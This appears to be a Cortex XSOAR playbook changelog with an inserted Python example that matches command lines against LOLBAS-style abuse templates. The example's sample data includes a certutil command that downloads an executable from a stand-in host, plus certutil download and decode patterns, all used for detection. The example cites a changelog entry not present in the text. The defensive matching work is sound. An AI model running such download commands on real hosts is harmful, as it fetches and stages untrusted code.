Improved the performance of the playbook by ensuring that only unique indicators are retrieved from the cache.
Cloud IAM Enrichment - Generic
- Fixed an issue where the playbook would attempt to enrich users even when the username input was empty.
- Added additional sub-outputs related to the risky user history to the declared outputs of the playbook.
Get Email From Email Gateway - Generic
Removed the User ID input because it was not being used.
- 30774
Playbooks
Extract Indicators From File - Generic v2
- Fixed an issue with extracting indicators from PDF files and image files.
- The playbook no longer relies on the rasterize-pdf command to convert PDF files to images.
Block Indicators - Generic v3
Added a default value for the "Tag" input. Blocked indicators are tagged with it, and the Phishing alert layout in Cortex XSOAR and Cortex XSIAM uses that tag to display the blocked indicators.
- 30590
Playbooks
Block Domain - Generic
Deprecated. Use 'Block Domain - Generic v2' instead.
Block Domain - Generic v2
Added the input 'Expiration' to support the expiration date and time for blocked domains.
Block Email - Generic
- Deprecated. Use 'Block Email - Generic v2' instead.
Block Account - Generic v2
- Fixed conditional tasks with incorrect names for Clarizen and Okta integrations.
- Added a task that retrieves account IDs to block from SailPoint IAM.
- Minor visibility improvements.
Block Account - Generic
Deprecated. Use 'Block Account - Generic v2' instead.
- 29521
Playbooks
Endpoint Enrichment - Generic v2.1
Added support for the Cortex Core - IR integration, which adds the Identity Threat Detection & Response (ITDR) functionality to Cortex XSIAM.
Account Enrichment - Generic v2.1
Added support for the Cortex Core - IR integration, which adds the Identity Threat Detection & Response (ITDR) functionality to Cortex XSIAM.
Entity Enrichment - Generic v3
Added support for the Cortex Core - IR integration, which adds the Identity Threat Detection & Response (ITDR) functionality to Cortex XSIAM.
- 30029
Playbooks
Threat Hunting - Generic
Updated the sub-playbook inputs and the script arguments from simple to complex values.
Search And Delete Emails - Generic v2
Updated the conditional task to check whether the O365 - Security And Compliance - Content Search v2 integration is available, in addition to the existing check for the O365 - Security And Compliance - Content Search (Deprecated) integration.
Calculate Severity - Generic v2
Updated conditional task 15 to ignore case when Severities.EmailAuthenticitySeverity equals Medium.
Search Endpoints By Hash - Generic V2
Added the input inputs.MD5 to the inputs of the sub-playbook Search Endpoints By Hash - Carbon Black Response V2.
Retrieve File from Endpoint - Generic V3
Updated the script arguments on task 5 from simple to complex values.
Search Endpoint by CVE - Generic
Fixed an issue with the conditional task that checks whether the RiskSense integration is available.
Email Headers Check - Generic
Updated the condition in task 1 to check that the key Email.HeadersMap is not empty; the condition was changed from "is defined" to "is not empty".
- 29711
Playbooks
Entity Enrichment - Generic v3
- Fixed an issue where risky users and hosts were not output by the Entity Enrichment playbook.
- Added the URLSSLVerification input to control whether SSL certificates are verified for URLs from within the Entity Enrichment playbook inputs.
Endpoint Enrichment - Generic v2.1
Fixed an issue that caused all risky hosts to be output, instead of only the risk context of the endpoint being enriched.
- 29309
Playbooks
Detonate and Analyze File - Generic
The sub-playbook "Detonate and Analyze File - JoeSecurity" is no longer in use and has been replaced by the sub-playbook "Detonate File - JoeSecurity V2".
Detonate File - Generic
Added the Detonate File - ThreatGrid v2 sub-playbook to replace the deprecated and EOL Detonate File - ThreatGrid sub-playbook. The Detonate File - ThreatGrid sub-playbook will reach its end of life (EOL) at: Sep 01, 2023 and it will still be available for six months after the EOL date. Use the ThreatGrid v2 integration instead.
- 28950
Playbooks
Block Email - Generic v2
- Modified the 'fromType' parameter in the 'mimecast-create-policy' command from 'everyone' to 'individual_email_address' to prevent the complete blocking of email activities across the user organization.
- Added a conditional task to confirm the emails intended for blocking, received from the playbook input 'EmailToBlock'.
Command-Line Analysis
- The decoded command is now passed as an input to the 'Compare Process Execution Arguments To LOLBAS Patterns' sub-playbook.
- 29016
Playbooks
Detonate File - Generic
- The sub-playbook "CrowdStrike Falcon Sandbox - Detonate File" is no longer in use and has been replaced by the sub-playbook "Detonate File - CrowdStrike Falcon Sandbox v2". The old playbook will still be available for six months, after which it will be removed from the marketplace.
New: Cloud User Investigation - Generic
New: This playbook performs an investigation on a specific user in cloud environments, using queries and logs from Azure Log Analytics, AWS CloudTrail, G Suite Auditor, and GCP Logging.
(Available from Cortex XSOAR 6.9.0).
- 28843
Playbooks
Command-Line Analysis
- Added the new sub-playbook "Compare Process Execution Arguments To LOLBAS Patterns". This sub-playbook checks whether a given process exists in the LOLBAS repository. If it does, the playbook compares the incident's command line against the known patterns of malicious commands listed in LOLBAS. The results are added to the "CommandlineVerdict" output and influence the overall verdict.
Account Enrichment - Generic v2.1
- Added the 'xdr-list-risky-users' automation to retrieve an account's risk score and factors influencing the score from Cortex XDR.
Endpoint Enrichment - Generic v2.1
- Added the 'xdr-list-risky-hosts' automation to retrieve a host's risk score and factors influencing the score from Cortex XDR.
- 28667
- 28597
- 28659
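Two of the notes above describe the same operation from different angles: Search and Compare Process Executions - Generic compares the command line of each execution it finds against the arguments supplied in the "Processes" input, and the Compare Process Execution Arguments To LOLBAS Patterns sub-playbook checks the incident's command line against the command templates LOLBAS documents for that binary. The following is an added example, not code from the Common Playbooks pack or the LOLBAS project, showing one matcher that serves both. The LOLBAS entry is constructed to mirror the project's YAML layout (Name, Commands[].Command/Category/MitreID) and is not a copy of the repository; the matching rule (same binary, every literal flag of the template present, placeholders and URL/path tokens treated as wildcards, flag order ignored) is this example's own, not necessarily the playbook's; the search results are constructed, not real telemetry.

```python
"""Command-line comparison for process-execution hunting (added example, not pack code).

(1) compare_executions: search results vs. the analyst-supplied 'Processes' input
    ({"value": process name, "commands": command-line arguments}).
(2) lolbas_verdict: does the incident command line fit a documented LOLBAS command?
All entries, rules and sample data below are constructed for this example.
"""
import re

# Constructed entry mirroring the LOLBAS YAML layout; assumed shape, not copied from the repo.
LOLBAS_ENTRIES = [
    {
        "Name": "Certutil.exe",
        "Commands": [
            {"Command": "certutil.exe -urlcache -split -f {REMOTEURL} {PATH}",
             "Category": "Download", "MitreID": "T1105"},
            {"Command": "certutil -decode {PATH:.b64} {PATH:.exe}",
             "Category": "Decode", "MitreID": "T1140"},
        ],
    },
]

# Constructed search results standing in for XQL / Defender output; not real telemetry.
SAMPLE_EXECUTIONS = [
    {"host": "ws-014", "process": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.7/u.exe C:\\Users\\Public\\u.exe"},
    {"host": "ws-022", "process": "certutil.exe",
     "cmdline": "certutil.exe -hashfile C:\\Windows\\explorer.exe SHA256"},
]

TOKEN = re.compile(r'"[^"]*"|\S+')            # a double-quoted path stays one token
PLACEHOLDER = re.compile(r"^(\{.*\}|<.*>)$")  # {PATH}, {REMOTEURL}, <url> ...


def tokenize(cmdline):
    """Split on whitespace (honouring double quotes) and lowercase; Windows arguments are case-insensitive."""
    return [t.strip('"').lower() for t in TOKEN.findall(cmdline)]


def binary_name(token):
    """'c:\\windows\\system32\\certutil.exe' -> 'certutil.exe'; a bare 'certutil' gets '.exe' appended."""
    name = re.split(r"[\\/]", token)[-1]
    return name if "." in name else name + ".exe"


def arguments(cmdline, proc):
    """Tokens after the program itself, whether or not the command line repeats the binary."""
    tokens = tokenize(cmdline)
    if tokens and binary_name(tokens[0]) == proc:
        tokens = tokens[1:]
    return tokens


def is_value(token):
    """Template tokens that stand for analyst-chosen values (placeholders, URLs, paths), not flags."""
    return bool(PLACEHOLDER.match(token)) or "://" in token or "\\" in token


def matches_template(cmdline, template):
    """Same binary and every literal flag of the template present. Flag order is ignored so that
    reordered arguments still match, and placeholder positions accept anything."""
    obs, tpl = tokenize(cmdline), tokenize(template)
    if not obs or not tpl or binary_name(obs[0]) != binary_name(tpl[0]):
        return False
    required = {t for t in tpl[1:] if not is_value(t)}
    return required.issubset(obs[1:])


def lolbas_verdict(process_name, cmdline, entries=LOLBAS_ENTRIES):
    """Matching LOLBAS commands for this execution; [] when the binary is not in LOLBAS or none of
    its documented abuse patterns fit (a benign 'certutil -hashfile', for instance)."""
    wanted = binary_name(process_name.lower())
    hits = []
    for entry in entries:
        if binary_name(entry["Name"].lower()) != wanted:
            continue
        for cmd in entry["Commands"]:
            if matches_template(cmdline, cmd["Command"]):
                hits.append({"Command": cmd["Command"], "Category": cmd["Category"],
                             "MitreID": cmd["MitreID"]})
    return hits


def compare_executions(processes, executions):
    """One row per execution of a process named in the 'Processes' input, flagging whether its
    arguments equal the ones the analyst supplied (exact match after normalisation)."""
    expected = {}
    for p in processes:
        proc = binary_name(p["value"].lower())
        expected[proc] = arguments(p["commands"], proc)
    rows = []
    for ex in executions:
        proc = binary_name(ex["process"].lower())
        if proc in expected:
            rows.append({"host": ex["host"], "process": proc,
                         "same_arguments": arguments(ex["cmdline"], proc) == expected[proc]})
    return rows


if __name__ == "__main__":
    for ex in SAMPLE_EXECUTIONS:
        print(ex["host"], lolbas_verdict(ex["process"], ex["cmdline"]))
    print(compare_executions(
        [{"value": "certutil.exe",
          "commands": "-urlcache -split -f http://203.0.113.7/u.exe C:\\Users\\Public\\u.exe"}],
        SAMPLE_EXECUTIONS))
```

The subset rule is deliberately loose on values and strict on flags: a download with a different URL or output path still hits the T1105 template, while the hash-only invocation on ws-022 does not, which is the distinction an analyst wants before the verdict feeds CommandlineVerdict. Real LOLBAS entries sometimes hard-code sample file names instead of placeholders; those tokens would be treated as required flags here, so normalise them to placeholders before loading.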
Playbooks
Block IP - Generic v2
- Deprecated. Use the Block IP - Generic v3 playbook instead.
Endpoint Enrichment - Generic v2.1
- Updated the deprecated command cb-sensor-info to cb-edr-sensors-list. The deprecated command cb-sensor-info is part of the VMware Carbon Black EDR pack and reached its end of life (EOL) on July 01, 2022. Use the Carbon Black EDR v2 integration instead.
- Updated the deprecated command extrahop-device-search to extrahop-devices-search.
- Added the new output CarbonBlackEDR.Sensor.
Isolate Endpoint - Generic V2
- Replaced the sub-playbook Block Endpoint - Carbon Black Response V2 with the sub-playbook Block Endpoint - Carbon Black Response V2.1.
- Removed the unnecessary outputs: CbResponse.Sensors.CbSensorID, CbResponse.Sensors.Status, CbResponse.Sensors.Isolated.
- Added new outputs: CarbonBlackEDR.Sensor, CarbonBlackEDR.Sensor.id, CarbonBlackEDR.Sensor.status.
- 27100
Playbooks
New: Cloud Compute Enrichment - Generic
- New: This playbook provides a generic enrichment of AWS, GCP, and Azure compute resources.
New: Cloud Enrichment - Generic
- New: Generic Cloud Enrichment Playbook. The Cloud Enrichment - Generic playbook is designed to unify all the relevant playbooks concerning the enrichment of information in the cloud. It provides a standardized approach to enriching information in cloud environments.
Supported blocks:
- Cloud IAM Enrichment - Generic: enriches information related to Identity and Access Management (IAM) in the cloud.
- Cloud Compute Enrichment - Generic: enriches information related to cloud compute resources.
The playbook supports a single CSP enrichment at a time.
- 27331
Playbooks
Block Email - Generic v2
- Added the command cisco-sma-list-entry-append. It replaces the deprecated command cisco-email-security-list-entry-add, which is part of the Cisco Email Security pack and will reach its end of life (EOL) on Jul 01, 2023.
The deprecated command cisco-email-security-list-entry-add will be removed from the playbook after the EOL date.
Use the Cisco SMA integration instead.
CVE Enrichment - Generic v2
- Replaced the command cve-search (XFE) with the command cve-search.
Domain Enrichment - Generic v2
- Removed the command vt-private-get-domain-report. This command is part of the deprecated VirusTotal (Deprecated) pack, which has reached its end of life (EOL) and is no longer supported. Use the VirusTotal (API v3) integration instead.
- 26983
Playbooks
New: Get User Devices by Email Address - Generic
This playbook retrieves information on all of the associated user devices, based on the user's email address.
To produce a generic output, the following information on all retrieved devices is saved under the UserDevices context key:
- Name
- Serial Number
- ID
- Model
- MAC Address
- OS
- Integration
Note that not all of the supported integrations are able to retrieve all of this information.
Supported integrations:
- jamf v2
- Google Workspace (Gsuite)
- ServiceNow v2
- Active Directory Query v2
- Microsoft Graph API (to get device details, grant the permissions listed at https://learn.microsoft.com/en-us/graph/api/user-list-owneddevices?view=graph-rest-1.0&tabs=http)
(Available from Cortex XSOAR 6.8.0).
New: Get User Devices - Generic
This playbook retrieves information on all of the associated user devices.
To produce a generic output, the following information on all retrieved devices is saved under the UserDevices context key:
- Name
- Serial Number
- ID
- Model
- MAC Address
- OS
- Integration
Note that not all of the supported integrations are able to retrieve all of this information.
For the full list of supported integrations, read the descriptions of the following sub-playbooks:
- Get User Devices by Username - Generic
- Get User Devices by Email Address - Generic
(Available from Cortex XSOAR 6.8.0).
New: Get User Devices by Username - Generic
This playbook retrieves information on all of the associated user devices, based on the user's username.
To produce a generic output, the following information on all retrieved devices is saved under the UserDevices context key:
- Name
- Serial Number
- ID
- Model
- MAC Address
- OS
- Integration
Note that not all of the supported integrations are able to retrieve all of this information.
Supported integrations:
- jamf v2
- Microsoft Defender for Endpoint
- Cortex XDR IR
- ServiceNow v2
- Google Workspace (Gsuite)
- Active Directory Query v2
(Available from Cortex XSOAR 6.8.0).
- 26591
Playbooks
Detonate File - Generic
- Updated the playbook to use the OPSWAT-Filescan opswat-filescan-scan-file command instead of the deprecated SNDBOX sub-playbook.
Detonate URL - Generic
- Updated the playbook to use the OPSWAT-Filescan opswat-filescan-scan-url command.
- 26495
- 26021
- 26580
- 26507
Playbooks
User Investigation - Generic
- Added a task to set the key NumOfOktaFailedLogon to zero if the failed login search returns no result.
- Added a task to set the key NumOfSiemFailedLogon to zero if the failed login search returns no result.
- Added task to set the key value
- 26133
- 26048
Playbooks
Account Enrichment - Generic v2.1
- Fixed the condition in task 58, "Is there a manager?", which also needed to verify that MSGraphUser.ID exists.
- Fixed an issue in task 54. The playbook input UserEmail value was changed from Account.Email.Address to Account.Email.
- 26156
INFO
Certification | Certified |
Supported By | Cortex |
Created | August 17, 2020 |
Last Release | April 25, 2024 |